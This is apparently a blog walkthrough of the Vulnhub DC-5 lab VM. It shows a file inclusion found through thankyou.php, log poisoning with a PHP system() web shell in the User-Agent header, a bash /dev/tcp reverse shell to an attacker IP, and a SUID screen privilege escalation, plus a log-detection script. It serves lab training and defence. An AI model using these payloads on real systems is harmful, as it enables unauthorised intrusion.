Vulnhub DC_5

Preface

Vulnhub DC5

https://www.vulnhub.com/entry/dc-5,314/

Target IP

192.168.1.5

Information gathering

nmap -p- --min-rate 10000 192.168.1.7 -oN nmap/port.txt 
PORT      STATE SERVICE                                                   
80/tcp open http
111/tcp open rpcbind
45665/tcp open unknown
nmap -sT -sC -sV -O -p80,111,45665 192.168.1.7 -oN nmap/detail.txt
STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-title: Welcome
|_http-server-header: nginx/1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 44972/udp status
| 100024 1 45665/tcp status
| 100024 1 45705/udp6 status
|_ 100024 1 50069/tcp6 status
45665/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:99:6F:74 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop
  • Operating system: Linux 3.2 - 4.14

  • Open ports: 80, 111, 45665

  • nginx 1.6.2

gobuster dir -u http://192.168.1.7/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
dirsearch -u http://192.168.1.7 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt
(Status: 200) [Size: 4025]
images               (Status: 301) [Size: 184] [--> http://192.168.1.7/images/]
contact.php (Status: 200) [Size: 4282]
faq.php (Status: 200) [Size: 5645]
solutions.php (Status: 200) [Size: 4100]
footer.php (Status: 200) [Size: 17]
css (Status: 301) [Size: 184] [--> http://192.168.1.7/css/]
about-us.php (Status: 200) [Size: 4292]
thankyou.php (Status: 200) [Size: 852]

LFI

I only learned that a file inclusion exists here after looking up a writeup.

http://192.168.1.7/contact.php

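After submitting the form, the page redirects to /thankyou.php.

On each refresh, the footer at the bottom keeps changing.

The directory scan shows a standalone footer.php that behaves the same way, while the footers on the other pages do not change; only /thankyou.php does. From this it can be inferred that /thankyou.php includes footer.php.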

fuzz

ffuf -u "http://192.168.1.7/thankyou.php?FUZZ=./thankyou.php" -w fuzz_params.txt 

This yields the parameter file.

http://192.168.1.7/thankyou.php?file=/etc/passwd

This returns the contents of passwd.

Based on the nmap result (nginx 1.6.2), look for the log files.

/var/log/nginx/error.log

Write to the log

curl http://192.168.1.7/ -H "User-Agent: <?php system($_POST['cmd']); phpinfo();?>"

Connect with AntSword

Reverse shell

/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.17/6666 0>&1'
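
Seen from the server side, the requests in this section leave two distinct traces in the nginx access log: a path-like value in the file parameter, and a PHP open tag in a client-controlled header. The following detection sketch is an added example, not part of the original writeup; it assumes nginx's default "combined" log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# nginx "combined" format: ip - user [time] "METHOD uri proto" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
# A PHP open tag never belongs in a URI, Referer or User-Agent.
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)
# Query values that look like filesystem paths or stream wrappers, not page names.
# (A legitimate URL-valued parameter would also match; tune per application.)
PATH_LIKE = re.compile(r'^(/|[a-z]+://)|\.\./', re.IGNORECASE)

# Constructed sample access-log lines modelled on the requests in this writeup.
SAMPLE_LOG = """\
192.168.1.17 - - [21/Feb/2026:18:02:11 +0800] "GET /thankyou.php?firstname=a&lastname=b HTTP/1.1" 200 852 "-" "Mozilla/5.0"
192.168.1.17 - - [21/Feb/2026:18:04:48 +0800] "GET /thankyou.php?file=/etc/passwd HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.1.17 - - [21/Feb/2026:18:20:03 +0800] "GET / HTTP/1.1" 200 4025 "-" "<?php system($_POST['cmd']); phpinfo();?>"
192.168.1.17 - - [21/Feb/2026:18:31:57 +0800] "POST /thankyou.php?file=/var/log/nginx/error.log HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
""".splitlines()


def scan(lines):
    """Return (line_number, client_ip, reason) for each suspicious request."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not combined format; a production tool would count these
        for field in ("uri", "referer", "ua"):
            if PHP_TAG.search(unquote(m[field])):
                findings.append((n, m["ip"], f"php tag in {field}"))
        for key, value in parse_qsl(urlsplit(m["uri"]).query):
            if PATH_LIKE.search(value):
                findings.append((n, m["ip"], f"path-like value in parameter '{key}': {value}"))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Detection aside, the fix for this class of bug is for the page to pick its footer from a fixed allowlist of files instead of passing a request parameter to include.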

SUID screen privilege escalation

Find SUID binaries

find / -perm -4000 2>/dev/null

/bin/screen-4.5.0 is present.

searchsploit screen 4.5.0

An exploit script exists; download it and upload it to the target machine.

Run it.

The flag is in the root directory.

888b    888 d8b                                                      888      888 888 888 
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888




Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

Vulnhub DC_5
http://xiaowu5.cn/2026/02/21/Vulnhub-DC-5/
Author
5
Published on
February 21, 2026
License
BY XIAOWU